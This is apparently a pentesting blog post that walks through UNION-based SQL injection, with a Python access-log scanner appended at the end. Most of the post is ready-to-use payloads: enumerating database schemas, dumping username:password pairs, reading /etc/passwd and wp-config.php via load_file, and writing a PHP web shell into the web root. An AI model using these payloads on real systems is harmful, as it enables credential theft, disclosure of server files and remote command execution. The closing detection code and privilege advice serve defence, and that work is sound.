SQL INJECTION – Extracting Username and Password From Database

By Pentestblog 04/05/2022 SQL Injection


Hello, pentesters! In this article, we will look at how to extract the database name, table names, column names, and even usernames and passwords from a database.

Some basic SQL functions:

  • user()
  • version()
  • database()

1) Find Out User Information

  • union select user()
  • union select database()
  • union select version()

2) Find Out Database Name

  • union select group_concat(schema_name) from information_schema.schemata

3) Find Out Table Names

  • union select group_concat(table_name) from information_schema.tables where table_schema='#Database_Name'

4) Find Out Column Names

  • union select group_concat(column_name) from information_schema.columns where table_name='#Table_Name'

5) Extract Username And Password From Database

  • union select group_concat(username,':',password) from #table_name

6) Check All Privileges inside the Database

  • union select privilege_type FROM information_schema.user_privileges where grantee = "user()" #'uhc'@'localhost'

7) Read Arbitrary Operating System Files via the Database

  • union select load_file('/etc/passwd')
  • union select load_file('/etc/os-release')
  • union select load_file('/var/www/wordpress/wp-config.php')
  • union select load_file('/etc/issue')
  • union select load_file('/var/log/apache2/access.log')
  • union select load_file('/etc/apache2/sites-available/000-default.conf')
  • union select load_file('/etc/fstab')

8) Create a Malicious PHP Shell via the Database

  • union select "<?php system($_REQUEST[pentestblog]);?>" into outfile '/var/www/html/shell.php'
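
Seen from the defending side, each numbered step above leaves a recognisable string in the web server's access log. The following is an added example, not part of the original post: a small Python scanner that labels log lines by the step they correspond to. The log lines, the /item.php endpoint and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures keyed to the numbered steps of the post (MySQL syntax).
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("schema-enumeration", re.compile(
        r"\binformation_schema\.(?:schemata|tables|columns|user_privileges)\b")),
    ("credential-dump", re.compile(r"\bgroup_concat\s*\([^)]*\bpassword\b")),
    ("file-read", re.compile(r"\bload_file\s*\(")),
    ("file-write", re.compile(r"\binto\s+(?:out|dump)file\b")),
]

def normalise(raw):
    """URL-decode until stable (max 3 passes), lower-case, collapse whitespace."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", text.lower())

def classify(line):
    """Return the label of every signature that matches one log line."""
    text = normalise(line)
    return [name for name, rx in SIGNATURES if rx.search(text)]

def scan(lines):
    """Return (line_number, labels) for each line with at least one match."""
    hits = [(n, classify(line)) for n, line in enumerate(lines, 1)]
    return [(n, labels) for n, labels in hits if labels]

# Constructed access-log lines (documentation IP range, hypothetical endpoints).
SAMPLE_LOG = [
    '203.0.113.5 - - [04/May/2022:10:00:01 +0000] "GET /item.php?id=7 HTTP/1.1" 200 512',
    '203.0.113.5 - - [04/May/2022:10:00:09 +0000] "GET /item.php?id=7+union+select+'
    'group_concat(table_name)+from+information_schema.tables HTTP/1.1" 200 730',
    '203.0.113.5 - - [04/May/2022:10:00:15 +0000] "GET /item.php?id=7+union+select+'
    'group_concat(username,%27:%27,password)+from+users HTTP/1.1" 200 940',
    '203.0.113.5 - - [04/May/2022:10:00:21 +0000] "GET /item.php?id=7%20UNION%20SELECT'
    '%20load_file(%27/etc/passwd%27) HTTP/1.1" 200 1900',
    '198.51.100.9 - - [04/May/2022:10:01:02 +0000] "GET /news?q=trade+union+election HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for n, labels in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(labels)}")
```

A match shows that a request carried the payload, not that it succeeded, so correlate hits with response sizes, database errors and new files under the web root. Steps 7 and 8 also depend on the database account holding MySQL's FILE privilege and on the server's secure_file_priv setting, so revoking the former and restricting the latter removes them even where an injection point exists.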
